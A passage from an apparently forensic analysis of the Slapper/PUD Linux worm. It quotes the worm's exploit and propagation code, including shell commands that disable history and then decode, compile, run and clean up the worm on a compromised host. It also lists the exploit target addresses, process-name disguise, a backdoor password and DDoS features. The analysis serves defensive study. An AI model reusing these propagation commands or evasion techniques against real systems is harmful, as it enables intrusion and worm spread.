	      more. Closing an established connection is not
	      efficient since later on the worm will reconnect
	      to try to exploit the remote host.
	    </para>
	  </callout>

	  <callout arearefs="l1929">
	    <para>
	      If a specific host is found to have port 80 open, then
	      an exploitation attempt is launched. Before launching an
	      attack the worm forks another instance. This instance
	      performs the attack, handles propagation of the worm if
	      the attack is successful, and then exits. I'll explain
	      the <function>exploit()</function> function below.
	    </para>
	  </callout>
	</calloutlist>
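
	<para>
	  The address stepping in lines 1910 to 1919 is easy to get
	  wrong when reading nested conditions, so here it is isolated
	  in a small function. This is a sketch: the structure and
	  function names are hypothetical, and the choice of a new
	  <varname>a</varname> and <varname>b</varname> is left to the
	  caller instead of being done inline as in the worm.
	</para>

	<programlisting><![CDATA[
```c
/* Hypothetical scan position: the four octets of the current address. */
struct scan_pos {
    unsigned char a, b, c, d;
};

/* Advance to the next address in the same order as lines 1910-1919.
 * Returns 1 when the a.b.x.x range is exhausted and the caller must
 * pick a new a and b, 0 otherwise. */
int next_address(struct scan_pos *p)
{
    if (p->d == 255) {
        p->d = 0;
        if (p->c == 255) {
            p->c = 0;
            return 1;   /* wrapped: choose a new network */
        }
        p->c++;
    } else {
        p->d++;
    }
    return 0;
}
```
]]></programlisting>

	<para>
	  As in the worm, the step is taken before the address is
	  used, so starting from <varname>c</varname> and
	  <varname>d</varname> equal to zero the first address probed
	  is a.b.0.1.
	</para>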

      </sect3>

      <sect3 id="exploit">
	<title>Penetrating Vulnerable Hosts</title>

	<para>
	  The function <function>exploit()</function> is very
	  important because it is the one that launches an
	  exploitation attempt and spreads the worm if the attack
	  is successful. The function begins in line 1697.
	  Let's see what this function does (I'll just include the
	  most important parts of it):
	</para>

	<programlisting>
1697 void exploit(char *ip) {
1698   int port = 443;
1699   int i;
1700   int arch=-1;
1701   int N = 20;
1702   ssl_conn* ssl1;
1703   ssl_conn* ssl2;
1704   char *a;
1705
1706   alarm(3600);
1707   if ((a=GetAddress(ip)) == NULL) exit(0); <co id="l1707"/>
1708   if (strncmp(a,"Apache",6)) exit(0); <co id="l1708"/>
1709   for (i=0;i&lt;MAX_ARCH;i++) { <co id="l1709"/>
1710     if (strstr(a,architectures[i].apache) &amp;&amp; strstr(a,architectures[i].os)) {
1711       arch=i;
1712       break;
1713     }
1714   }
1715   if (arch == -1) arch=9; <co id="l1715"/>
1716
1717   srand(0x31337);
1718
1719   for (i=0; i&lt;N; i++) { <co id="l1719"/>
1720     connect_host(ip, port);
1721     usleep(100000);
1722   }
1723
1724   ssl1 = ssl_connect_host(ip, port); <co id="l1724"/>
1725   ssl2 = ssl_connect_host(ip, port);
1726
[...]
1751
1752   send_client_finished(ssl2);
1753   get_server_error(ssl2);
1754
1755   sh(ssl2->sock); <co id="l1755"/>
1756
1757   close(ssl2->sock);
1758   close(ssl1->sock);
1759
1760   exit(0);
1761 }</programlisting>
	<calloutlist>
	  <callout arearefs="l1707">
	    <para>
	      The first thing <function>exploit()</function> does
	      is to call the <function>GetAddress()</function>
	      function. <function>GetAddress()</function> in turn
	      establishes a TCP connection with port 80 of the remote
	      host. Once the connection is established, it sends the
	      bogus string "GET / HTTP/1.1\r\n\r\n". It is bogus
	      because HTTP version 1.1 requires a
	      "Host: &lt;hostname&gt;" header after the "GET" request
	      line, so the second "\r\n" pair ends the request too
	      early. But this doesn't matter because
	      the end goal is to make the remote web server return an
	      error message that can be used to identify
	      <emphasis>what the web server software is</emphasis>.
	    </para>

	    <para>
	      When the remote web server returns the error message,
	      <function>GetAddress()</function> will look for the
	      string "Server: xxxx", and return a pointer to
	      "xxxx". <function>exploit()</function>
	      will then decide, based on whether the remote web server
	      is <emphasis>Apache</emphasis>, whether to launch the
	      exploitation attempt. An example of what a remote web
	      server running Apache would return is:
	    </para>

	    <screen>
peloy@canaima:~$ nc localhost 80
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Wed, 27 Nov 2002 05:21:56 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1</screen>
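
	    <para>
	      Extracting the banner from a response like this one
	      needs nothing more than two string functions. The
	      following sketch is mine, not the worm's
	      <function>GetAddress()</function>; both function names
	      are hypothetical, and the sketch assumes the whole
	      response is already in a NUL-terminated buffer.
	    </para>

	    <programlisting><![CDATA[
```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: return a pointer to the text that follows
 * "Server: " in an HTTP response, or NULL if there is no such header. */
const char *server_banner(const char *response)
{
    static const char key[] = "Server: ";
    const char *p = strstr(response, key);

    return p ? p + (sizeof(key) - 1) : NULL;
}

/* Returns 1 if the banner starts with "Apache", which is the test
 * made in line 1708, and 0 otherwise. */
int is_apache(const char *response)
{
    const char *banner = server_banner(response);

    return banner != NULL && strncmp(banner, "Apache", 6) == 0;
}
```
]]></programlisting>

	    <para>
	      A server configured to send only "Server: Apache", as in
	      the example above, still passes this test, but it gives
	      the worm no version or distribution to match against.
	    </para>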
	  </callout>

	  <callout arearefs="l1708">
	    <para>
	      If the remote host <emphasis>is not running</emphasis>
	      Apache, then the worm gives up and exits (but remember
	      that this is a forked process, and the parent is still
	      running and scanning other hosts).
	    </para>
	  </callout>

	  <callout arearefs="l1709">
	    <para>
	      Here the worm is trying to maximize its chances of
	      success by determining what specific version of Apache,
	      and what Linux distribution, are running on the remote
	      host. By identifying precisely these two the worm can
	      tune one exploit-specific parameter that will improve
	      the chances of success. The different "architectures"
	      the worm knows about are stored in the
	      <varname>architectures[]</varname> array. There are 23
	      different combinations of Linux distributions and Apache
	      versions. The Linux distributions are Gentoo, Debian,
	      RedHat, SuSE, Mandrake, and Slackware. Apache versions
	      range from 1.3.6 to 1.3.26. The actual list of
	      architectures is:
	    </para>

	    <programlisting>
   1239 #define MAX_ARCH 21
   1240
   1241 struct archs {
   1242         char *os;
   1243         char *apache;
   1244         int func_addr;
   1245 } architectures[] = {
   1246         {"Gentoo", "", 0x08086c34},
   1247         {"Debian", "1.3.26", 0x080863cc},
   1248         {"Red-Hat", "1.3.6", 0x080707ec},
   1249         {"Red-Hat", "1.3.9", 0x0808ccc4},
   1250         {"Red-Hat", "1.3.12", 0x0808f614},
   1251         {"Red-Hat", "1.3.12", 0x0809251c},
   1252         {"Red-Hat", "1.3.19", 0x0809af8c},
   1253         {"Red-Hat", "1.3.20", 0x080994d4},
   1254         {"Red-Hat", "1.3.26", 0x08161c14},
   1255         {"Red-Hat", "1.3.23", 0x0808528c},
   1256         {"Red-Hat", "1.3.22", 0x0808400c},
   1257         {"SuSE", "1.3.12", 0x0809f54c},
   1258         {"SuSE", "1.3.17", 0x08099984},
   1259         {"SuSE", "1.3.19", 0x08099ec8},
   1260         {"SuSE", "1.3.20", 0x08099da8},
   1261         {"SuSE", "1.3.23", 0x08086168},
   1262         {"SuSE", "1.3.23", 0x080861c8},
   1263         {"Mandrake", "1.3.14", 0x0809d6c4},
   1264         {"Mandrake", "1.3.19", 0x0809ea98},
   1265         {"Mandrake", "1.3.20", 0x0809e97c},
   1266         {"Mandrake", "1.3.23", 0x08086580},
   1267         {"Slackware", "1.3.26", 0x083d37fc},
   1268         {"Slackware", "1.3.26",0x080b2100}
   1269 };</programlisting>

	  </callout>

	  <callout arearefs="l1715">
	    <para>
	      Notice here that if the worm cannot accurately identify
	      a specific architecture, it defaults to entry 9
	      (counting from zero) in the
	      <varname>architectures</varname> array, which is
	      RedHat and Apache 1.3.23.
	    </para>
	  </callout>

	  <callout arearefs="l1719">
	    <para>
	      Here the worm is getting into exploit-specific
	      territory: the worm exploits the vulnerability in
	      OpenSSL that was announced by the <ulink
	      url="http://www.cert.org/advisories/CA-2002-23.html">CERT/CC</ulink>
	      on July 30, 2002 (see the references in <xref
	      linkend="refs"/> for links to online documents that
	      contain more details). To exploit the vulnerability
	      the worm needs to connect to port 443 (HTTPS), so here
	      it attempts to open a connection to port 443 of the
	      remote host. It will retry 20 times, waiting 100
	      milliseconds between retries. Inside the function
	      <function>connect_host()</function> we can see that if
	      the connection fails, the worm will exit.
	    </para>
	  </callout>

	  <callout arearefs="l1724">
	    <para>
	      Between lines 1724 and 1753 is where the actual
	      exploitation of the OpenSSL vulnerability takes place. I
	      won't go into detail here because this is better
	      explained elsewhere (again, please refer to <xref
	      linkend="refs"/> for links to online documents that explain
	      the details of this vulnerability well.)
	    </para>
	  </callout>

	  <callout arearefs="l1755">
	    <para>
	      Finally, here the remote host has been compromised! The
	      worm is in and now it is time to perpetuate the species.
	      The function <function>sh()</function> is
	      responsible for propagating the worm to the compromised
	      machine. I will explain what this function does in the
	      next section.
	    </para>
	  </callout>
	</calloutlist>
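
	<para>
	  The target selection described in the callouts above can be
	  sketched as follows. This is a simplified illustration, not
	  the worm's own code: the names
	  <function>server_banner()</function>,
	  <function>pick_arch()</function> and
	  <varname>DEFAULT_ARCH</varname> are hypothetical, the
	  substring matching is only an assumption about how a banner
	  could be compared against the table, and only the first ten
	  table entries shown above are included.
	</para>

	<programlisting><![CDATA[
```c
#include <stddef.h>
#include <string.h>

struct arch {
    const char *os;          /* distribution name expected in the banner */
    const char *apache;      /* Apache version expected in the banner */
    unsigned long func_addr; /* exploit-specific parameter */
};

/* First ten entries (indices 0 to 9) of the table quoted above. */
static const struct arch table[] = {
    {"Gentoo",  "",       0x08086c34},
    {"Debian",  "1.3.26", 0x080863cc},
    {"Red-Hat", "1.3.6",  0x080707ec},
    {"Red-Hat", "1.3.9",  0x0808ccc4},
    {"Red-Hat", "1.3.12", 0x0808f614},
    {"Red-Hat", "1.3.12", 0x0809251c},
    {"Red-Hat", "1.3.19", 0x0809af8c},
    {"Red-Hat", "1.3.20", 0x080994d4},
    {"Red-Hat", "1.3.26", 0x08161c14},
    {"Red-Hat", "1.3.23", 0x0808528c},
};

#define DEFAULT_ARCH 9 /* fallback entry: Red-Hat, Apache 1.3.23 */

/* Return a pointer to the text after "Server: " in an HTTP response,
 * or NULL if the response has no such header. */
const char *server_banner(const char *response)
{
    const char *p = strstr(response, "Server: ");
    return p ? p + strlen("Server: ") : NULL;
}

/* Return -1 if the banner is not Apache, the index of the first table
 * entry whose OS and version both appear in the banner, or
 * DEFAULT_ARCH when Apache is detected but no entry matches. */
int pick_arch(const char *banner)
{
    size_t i;

    if (banner == NULL || strstr(banner, "Apache") == NULL)
        return -1;
    for (i = 0; i < sizeof table / sizeof table[0]; i++) {
        if (strstr(banner, table[i].os) && strstr(banner, table[i].apache))
            return (int)i;
    }
    return DEFAULT_ARCH;
}
```
]]></programlisting>

	<para>
	  With the terse banner from the example response above
	  ("Server: Apache") no distribution can be identified, so
	  this sketch falls back to <varname>DEFAULT_ARCH</varname>.
	</para>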

      </sect3>

      <sect3 id="owned">
	<title>"You're mine!" a.k.a "You're 0wn3d!" a.k.a "Take this for not
	patching your machines!"</title>

	<para>
	  Once a vulnerable host has been successfully compromised it
	  is time for the worm to preserve the species. Worm
	  propagation is done by the <function>sh()</function>
	  function, which is called after the OpenSSL attack has been
	  successful. At this point, the worm has an open shell on the
	  remote host, and is ready to start sending the commands that
	  will propagate the worm. Let's see what it does in detail:
	</para>

	<programlisting>
1403 int sh(int sockfd) {
1404   char localip[256], rcv[1024];
1405   fd_set rset;
1406   int maxfd, n;
1407
1408   alarm(3600);
1409   conv(localip,256,myip); memset(rcv,0,1024);
1410 // aion
1411   writem(sockfd,"export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;"
1412     "export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;"
1413     "exec bash -i\n");
1414   writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
1415                 "       /tmp/httpd /tmp/update /tmp/.unlock;\n"); <co id="l1415"/>
1416   writem(sockfd,"cat > /tmp/.unlock.uu &lt;&lt; __eof__; \n"); <co id="l1416"/>
1417   zhdr(1);
1418   encode(sockfd); <co id="l1418"/>
1419   zhdr(0);  
1420   writem(sockfd,"__eof__\n"); <co id="l1420"/>
1421   writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
1422                 "tar xzf /tmp/.unlock -C /tmp/;              "
1423     "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
1424     "gcc -o /tmp/update /tmp/.update.c;\n"); <co id="l1424"/>
1425   sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip); <co id="l1425"/>
1426   writem(sockfd,rcv); sleep(3);
1427   writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
1428                 "       /tmp/httpd /tmp/update; exit; \n"); <co id="l1428"/>
1429   for (;;) {
1430     FD_ZERO(&amp;rset);
1431     FD_SET(sockfd, &amp;rset);
1432     select(sockfd+1, &amp;rset, NULL, NULL, NULL);
1433     if (FD_ISSET(sockfd, &amp;rset)) if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) return 0;
1434   }
1435 }</programlisting>
	<calloutlist>
	  <callout arearefs="l1415">
	    <para>
	      The worm will generate these files while propagating
	      itself to the remote compromised machine:
	      <filename>/tmp/.unlock.uu</filename>,
	      <filename>/tmp/.unlock.c</filename>,
	      <filename>/tmp/.update.c</filename>,
	      <filename>/tmp/httpd</filename>,
	      <filename>/tmp/update</filename>, and
	      <filename>/tmp/.unlock</filename>. Here the worm is just
	      deleting these files (just in case they exist) to make
	      sure that nothing will stomp on the propagation process.
	    </para>
	  </callout>

	  <callout arearefs="l1416">
	    <para>
	      The worm starts writing to
	      <filename>/tmp/.unlock.uu</filename>. The worm is using
	      a "here document" and the <command>cat</command> command
	      to create the file. The remote shell will stop writing
	      data to the <filename>/tmp/.unlock.uu</filename> file as
	      soon as it sees the string "__eof__" (see
	      <command>bash</command>'s man page for details on how
	      "here documents" work).
	    </para>
	  </callout>

	  <callout arearefs="l1418">
	    <para>
	      The <function>encode()</function> function will take the
	      worm source, which is stored in the compressed GNU tar
	      archive <filename>/tmp/.unlock</filename>, "uuencode"
	      it, and send it to the remote shell by just "pasting"
	      the data into the shell's standard input. The worm uses
	      the uuencode encoding method to be able to transmit a
	      binary file (the compressed GNU tar archive) over a
	      transmission medium that supports only simple ASCII
	      data (uuencoding converts a binary file to ASCII
	      data.) The worm can't just transmit the GNU tar
	      archive as is because the shell and the remote terminal
	      would interpret some of the data as control characters
	      and the file transfer would fail.
	    </para>
	  </callout>

	  <callout arearefs="l1420">
	    <para>
	      The worm writes "__eof__" to tell the remote shell that
	      it is done sending data. With this, the file
	      <filename>/tmp/.unlock.uu</filename> is fully created
	      and the worm is ready for the next step.
	    </para>
	  </callout>

	  <callout arearefs="l1424">
	    <para>
	      The worm sends several commands in one line to the
	      remote shell. These commands will decode the uuencoded
	      file, untar it, and then compile the two C source code
	      files in the tar archive. The tools used in this process
	      are the <command>uudecode</command> command, the
	      <command>tar</command> command, and the GNU C Compiler
	      <command>gcc</command>, all of which are available in
	      most Linux installations by default.
	    </para>
	  </callout>

	  <callout arearefs="l1425">
	    <para>
	      The worm runs the two binaries produced. Now a new
	      instance of the worm is running on the remote
	      machine. This instance will start searching for other
	      machines to infect.
	    </para>
	  </callout>

	  <callout arearefs="l1428">
	    <para>
	      After waiting for three seconds, the worm finally
	      deletes all the files used in the propagation process,
	      <emphasis>except</emphasis> the file
	      <filename>/tmp/.unlock</filename>, which, as I already
	      mentioned, is the compressed GNU tar archive that
	      contains the worm source, and that is obviously needed
	      to propagate the worm to other machines.
	    </para>
	  </callout>

	</calloutlist>
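
	<para>
	  To make the uuencoding step more concrete, here is a minimal
	  sketch of how one line of uuencoded output is produced from
	  up to 45 input bytes. It illustrates the generic encoding
	  only and is not the worm's <function>encode()</function>
	  function: the names <function>uu_char()</function> and
	  <function>uu_encode_line()</function> are hypothetical, and
	  I assume the common convention of writing a zero value as a
	  backquote instead of a space.
	</para>

	<programlisting><![CDATA[
```c
#include <stddef.h>

#define UU_MAX_LINE 45 /* input bytes carried by one encoded line */

/* Map a 6-bit value to a printable character (0 becomes '`'). */
static char uu_char(unsigned v)
{
    v &= 0x3f;
    return v ? (char)(v + 32) : '`';
}

/* Encode up to UU_MAX_LINE bytes of in[] as one uuencoded line.
 * out[] must have room for at least 63 bytes. Longer input is
 * truncated to UU_MAX_LINE bytes. Returns the number of characters
 * written, not counting the terminating NUL. */
size_t uu_encode_line(const unsigned char *in, size_t n, char *out)
{
    size_t i, o = 0;

    if (n > UU_MAX_LINE)
        n = UU_MAX_LINE;
    out[o++] = uu_char((unsigned)n);          /* length prefix */
    for (i = 0; i < n; i += 3) {
        /* Take three bytes, padding with zeros past the end. */
        unsigned b0 = in[i];
        unsigned b1 = (i + 1 < n) ? in[i + 1] : 0;
        unsigned b2 = (i + 2 < n) ? in[i + 2] : 0;

        /* Split 24 bits into four 6-bit groups. */
        out[o++] = uu_char(b0 >> 2);
        out[o++] = uu_char(((b0 & 0x03) << 4) | (b1 >> 4));
        out[o++] = uu_char(((b1 & 0x0f) << 2) | (b2 >> 6));
        out[o++] = uu_char(b2 & 0x3f);
    }
    out[o++] = '\n';
    out[o] = '\0';
    return o;
}
```
]]></programlisting>

	<para>
	  Every output character falls in the printable ASCII range,
	  which is what lets the archive pass through the remote
	  shell untouched.
	</para>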

	<para>
	  With this, I have finally covered all the details regarding
	  how the worm propagates to other machines.
	</para>

      </sect3>

    </sect2>


  </sect1>

  <sect1 id="taming">
    <title>Taming the Worm</title>

    <para>
      After I studied the worm and had a good understanding of what it
      does I decided to have a little bit of fun
      with it. For this I ran the worm on a machine connected to a
      network that is disconnected from the Internet. I also wrote a
      small <ulink url="control.c.txt">C program</ulink> to control
      the worm. The control program allowed me to send commands to the
      worm, and then I observed the activity generated by the worm
      with a sniffer like <command>tcpdump</command>.
    </para>

    <para>
      Using the control program and observing the network traffic I
      was able to discover some of the bugs I have pointed out
      elsewhere in this document.
    </para>

    <para>Here's an example of how the control program looks:</para>

    <screen>
Agent address is 10.10.10.16

[0] Enter agent IP address
[1] Run a command on the agent
[2] UDP flood
[3] TCP flood
[4] DNS flood
[5] Scan remote files for e-mail addresses
[6] Exit

Enter option: 
    </screen>

  </sect1>

  <sect1 id="questions">
    <title>Questions</title>

    <sect2><title>Question 1</title>

      <para>
	<emphasis role="bold">Q</emphasis>: Which is the type of the
	.unlock file? When was it generated?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: As I showed in <xref
	linkend="inspection"/>, the <filename>.unlock</filename> file
	is a compressed GNU tar archive. The tar archive contains only
	two files, called <filename>.unlock.c</filename> and
	<filename>.update.c</filename>, which are C source
	files. The compressed GNU tar archive was generated on
	September 22, 2002 at 1:06 PM.
      </para>

    </sect2>

    <sect2><title>Question 2</title>

      <para>
	<emphasis role="bold">Q</emphasis>: Based on the source code,
	who is the author of this worm? When it was created? Is it
	compatible with the date from question 1?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: By examining the
	<filename>.unlock.c</filename> file we can guess that the
	author of the worm is an individual that uses the IRC alias
	contem on the EFNet IRC network. We can see that in the first
	lines of the program:
      </para>

      <para>
	<programlisting>
1 /******************************************************************
2  *                                                                *
3  *           Peer-to-peer UDP Distributed Denial of Service (PUD) *
4  *                         by contem@efnet                        *
5  *                                                                *
[...]</programlisting>
      </para>

      <para>
	However, the file we are looking at was
	modified by an individual that goes by the alias "aion", and whose
	e-mail address is aion@ukr.net.
      </para>
      
      <para>
	<programlisting>
[...]
37 *                                                                *
38 *  some modification done by aion (aion@ukr.net)                 *
39 ******************************************************************/
[...]</programlisting>
      </para>

      <para>
	The <filename>.unlock.c</filename> file was generated on
	September 20, 2002 at 9:28 AM, and the
	<filename>.update.c</filename> file was generated on
	September 19, 2002 at 5:57 PM. Since the compressed tar
	archive was generated two days later (on September 22,
	2002) I would say that the creation dates of the C source
	files are compatible with the creation date of the tar
	archive (in addition to the timestamps of the files, in
	the <filename>.unlock.c</filename> file, the symbol
	<varname>VERSION</varname> is declared in line 71 as "20092002",
	which seems to imply that the version number was chosen
	based on the day the code was released - September 20, 2002.)
      </para>

    </sect2>

    <sect2><title>Question 3</title>
	  
      <para>
	<emphasis role="bold">Q</emphasis>: Which process name is used
	by the worm when it is running?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: Line 78 of
	<filename>.unlock.c</filename> contains the following symbol
	definition:
      </para>

      <para>
	<programlisting>
78 #define PSNAME          "httpd "</programlisting>
      </para>

      <para>
	As I mentioned in <xref linkend="init"/>, in lines
	1803-1804, very close to the beginning of
	<function>main()</function>, the worm clears the program name
	as well as all the parameters passed on the command line
	by zeroing out the strings pointed to by the pointers in the
	<varname>argv</varname> array.
      </para>

      <para>
	Then, in line 1805, the worm calls the
	<function>strcpy()</function> C library function to copy
	the symbol <varname>PSNAME</varname> to the string pointed
	by the <varname>argv[0]</varname> pointer, which happens
	to be the program's name.
      </para>

      <para>
	The end result is that the worm disguises its process name:
	an administrator running the <command>ps</command> command
	would only see a process named "httpd".
      </para>
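
      <para>
	The <varname>argv</varname> rewriting just described can be
	sketched as follows. The function name
	<function>mask_process_name()</function> is hypothetical, and
	unlike the worm's plain <function>strcpy()</function> this
	sketch limits the copy to the original length of
	<varname>argv[0]</varname>, which is my own precaution rather
	than something the worm does.
      </para>

      <programlisting><![CDATA[
```c
#include <string.h>

/* Zero every command-line string in place, then write fake_name over
 * argv[0]. At most strlen(argv[0]) bytes are written, so the original
 * terminating NUL of argv[0] is never overwritten. */
void mask_process_name(int argc, char **argv, const char *fake_name)
{
    size_t room;
    int i;

    if (argc < 1 || argv[0] == NULL)
        return;
    room = strlen(argv[0]);          /* measure before clearing */
    for (i = 0; i < argc; i++)
        memset(argv[i], 0, strlen(argv[i]));
    strncpy(argv[0], fake_name, room);
}
```
]]></programlisting>

      <para>
	Calling this at the start of <function>main()</function>
	with "httpd " as the last argument reproduces the effect
	described above on systems where <command>ps</command> reads
	the process's argument area.
      </para>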

    </sect2>

    <sect2><title>Question 4</title>

      <para>
	<emphasis role="bold">Q</emphasis>: In which format the worm
	copies itself to the new infected machine?  Which files are
	created in the whole process? After the worm executes itself,
	which files remain on the infected machine?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: As I explained in <xref
	linkend="owned"/>, the worm uses the command
	<command>cat</command> and the "here document" syntax of the
	<command>bash</command> shell to copy the compressed GNU tar
	archive that contains the worm's source code to the newly
	compromised machine. Since the worm is just sending the data
	to the standard input of the remote shell, it can't copy
	the tar archive as it is because it contains binary data that
	could be interpreted as shell meta-characters or terminal
	control data. For this reason, the worm
	<emphasis>uuencodes</emphasis> the file and transmits the
	resulting data, which is just regular ASCII text.
      </para>

      <para>
	The files that are created during the worm propagation
	process are:
      </para>

      <itemizedlist>
	<listitem>
	  <para>
	    <filename>/tmp/.unlock.uu</filename>: this is the
	    uuencoded version of the file
	    <filename>/tmp/.unlock</filename>. The
	    <filename>.unlock.uu</filename> file is created by the
	    <command>cat</command> command, which sends the data it
	    receives on its standard input to the file.
	  </para>
	</listitem>
	<listitem>
	  <para>
	    <filename>/tmp/.unlock</filename>: this is the
	    compressed GNU tar archive that contains the two C
	    source code files of the worm. This file is created
	    when the worm executes the command <command>uudecode
	      -o /tmp/.unlock /tmp/.unlock.uu</command>.
	  </para>
	</listitem>
	<listitem>
	  <para>
	    <filename>/tmp/.unlock.c</filename> and
	    <filename>/tmp/.update.c</filename>: these two files
	    contain the worm's source code and are created by the
	    command <command>tar xzf /tmp/.unlock -C /tmp/</command>.
	  </para>
	</listitem>
	<listitem>
	  <para>
	    <filename>/tmp/httpd</filename> and
	    <filename>/tmp/update</filename>: these are Linux
	    executable files, and are created when the worm
	    compiles <filename>/tmp/.unlock.c</filename> and
	    <filename>/tmp/.update.c</filename>.
	  </para>
	</listitem>
      </itemizedlist>

      <para>
	After the worm executes itself in the remote machine, the only
	file that remains is <filename>/tmp/.unlock</filename>, the
	compressed GNU tar archive that contains the worm's source
	code. All other files are deleted.
      </para>

    </sect2>

    <sect2><title>Question 5</title>
	
      <para>
	<emphasis role="bold">Q</emphasis>: Which port is scanned by
	the worm?
      </para>
	
      <para>
	<emphasis role="bold">A</emphasis>: The worm scans for TCP
	port 80, the Hypertext Transfer Protocol (HTTP) port. If this
	port is found open, i.e. a TCP connection is successfully
	established, the worm proceeds to launch the exploit. The
	actual scan takes place in line 1923, where the worm executes
	<function>atcp_sync_connect(&amp;clients[n],srv,SCANPORT)</function>.
	<varname>SCANPORT</varname> is a symbol defined as "80" at the
	beginning of the worm's C source file.
      </para>

    </sect2>
      
    <sect2><title>Question 6</title>

      <para>
	<emphasis role="bold">Q</emphasis>: Which vulnerability the
	worm tries to exploit? In which architectures?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: The worm exploits the
	OpenSSL SSLv2 malformed client key buffer overflow
	vulnerability, which, as we have seen, allows remote
	exploitation. I will not go into detail here since
	excellent references to this vulnerability are available on
	the web, and they explain the problem better than I
	could. Check the references in <xref linkend="refs"/>.
      </para>

      <para>
	Once a host has been found to have port 80 open, the worm
	tries to exploit the vulnerability by launching an attack
	against the HTTPS port, which on most Apache installations
	is served using the OpenSSL libraries.
      </para>

      <para>
	As for the "architectures" the worm tries to exploit,
	"architectures" is not the correct word (although that is the
	word used in the C source code.) The exploit the worm uses
	works <emphasis>only</emphasis> on the Intel i386 family, no
	Sparcs, no PowerPCs, no ia64, no anything else (the worm will
	try to exploit all other architectures as long as it finds
	open TCP port 80, but the exploit will not succeed.)  Now,
	there are several "targets" the worm knows about and that
	guarantee the success of the exploitation. For these known
	"targets", the worm knows it can tune an exploitation
	parameter so the exploit succeeds. The different "targets" the
	worm knows about are stored in the
	<varname>architectures[]</varname> array. There are 23
	different combinations of Linux distributions and Apache
	versions. The Linux distributions are Gentoo, Debian, RedHat,
	SuSE, Mandrake, and Slackware. Apache versions range from
	1.3.6 to 1.3.26 (see <xref linkend="exploit"/> or line 1241 of
	<filename>.unlock.c</filename> for the actual declaration of
	the <varname>architectures[]</varname> array.)
      </para>

    </sect2>

    <sect2><title>Question 7</title>

      <para>
	<emphasis role="bold">Q</emphasis>: What kind of information
	is sent by the worm by email? To which account?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: As I mentioned in <xref
	linkend="init"/>, the worm sends an e-mail to the address
	<email>aion@ukr.net</email>. It sends the e-mail by
	establishing a direct TCP connection to port 25 (SMTP) of the
	host freemail.ukr.net, and by pretending to be
	<email>test@microsoft.com</email>.
      </para>

      <para>
	The information sent by the worm is just:
      </para>

      <literallayout>
hostid:   (decimal number)
hostname: (string)
att_from: (string)
      </literallayout>

      <para>
	hostid and hostname are obtained via the
	<function>gethostid()</function> and
	<function>gethostname()</function> C library functions, and
	they refer to the host executing the worm. att_from is the
	only parameter passed to the <function>mailme()</function>
	function, and represents the first argument passed to the worm
	on the command line. This argument is an IP address.
      </para>
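
      <para>
	As an illustration of the message layout shown above, the
	three fields could be formatted as in the sketch below. The
	function name <function>format_report()</function> and the
	CRLF line endings are my own assumptions, not taken from the
	worm source. The values are passed in as parameters so the
	example stays independent of the host it runs on.
      </para>

      <programlisting><![CDATA[
```c
#include <stdio.h>

/* Write the three report fields into buf, one per line.
 * Returns what snprintf() returns: the length of the full text,
 * which is >= size if the buffer was too small. */
int format_report(char *buf, size_t size, long hostid,
                  const char *hostname, const char *att_from)
{
    return snprintf(buf, size,
                    "hostid:   %ld\r\n"
                    "hostname: %s\r\n"
                    "att_from: %s\r\n",
                    hostid, hostname, att_from);
}
```
]]></programlisting>

      <para>
	In the worm the first two values would come from
	<function>gethostid()</function> and
	<function>gethostname()</function>, as described above.
      </para>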

    </sect2>
	
    <sect2><title>Question 8</title>

      <para>
	<emphasis role="bold">Q</emphasis>: Which port (and protocol)
	is used by the worm to communicate to other infected machines?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: The worm uses UDP port
	4156 to talk to other peers. In the C source code, the symbol
	<varname>PORT</varname> is used, and it is defined as "4156"
	at the beginning of the C source file.
      </para>

    </sect2>
	
    <sect2><title>Question 9</title>

      <para>
	<emphasis role="bold">Q</emphasis>: Name 3 functionalities
	built in the worm to attack other networks.
      </para>
	
      <para>
	<emphasis role="bold">A</emphasis>: The worm can be remotely
	programmed to generate three types of denial of service (DoS)
	attacks. The three types are UDP flood, TCP flood, and DNS
	flood. The UDP and TCP floods are intended to be used against
	any host, and the DNS flood is intended to be used against DNS
	servers since it sends DNS queries to the DNS port (UDP 53) of
	the specified IP address.
      </para>

      <para>
	Because of the way the worm communicates with other infected
	machines, it is easy to use these attacks to create a major
	Distributed Denial of Service Attack (DDoS), where hundreds or
	thousands of machines create chaos by DoS'ing one or more
	hosts.
      </para>

      <para>
	I personally tested the three attacks, as I mentioned in <xref
	linkend="taming"/>. The UDP and TCP attacks worked fine (well,
	the program is a bit buggy, but the attacks worked more or
	less.) The DNS attack seemed to have some problems.
      </para>

    </sect2>
    
    <sect2><title>Question 10</title>

      <para>
	<emphasis role="bold">Q</emphasis>: What is the purpose of the
	.update.c program? Which port does it use?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>:
	<filename>.update.c</filename> is a little program written not
	by the original worm author but by aion
	<email>aion@ukr.net</email>, the (apparently 21-year old)
	person who modified the original worm. It just provides
	a shell on demand on TCP port 1052. To get a shell on a
	machine running this program one needs to provide the password
	"aion1981" as soon as the TCP connection with port 1052 is
	established. That is the theory, at least, since the program
	as it is has a critical bug:
      </para>

      <programlisting>
52         for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
53         {
54           soc_cli = accept(soc_des,
55                       (struct sockaddr *) &amp;client_addr,
                         sizeof(client_addr)); <co id="l55"/>
56           if (soc_cli > 0)
57           {
58             if (!fork()) {</programlisting>
      <calloutlist>
	<callout arearefs="l55">
	  <para>
	    The <function>accept()</function> function requires that
	    the last parameter be a <emphasis>pointer</emphasis> to an
	    integer that is initially set to the size of the
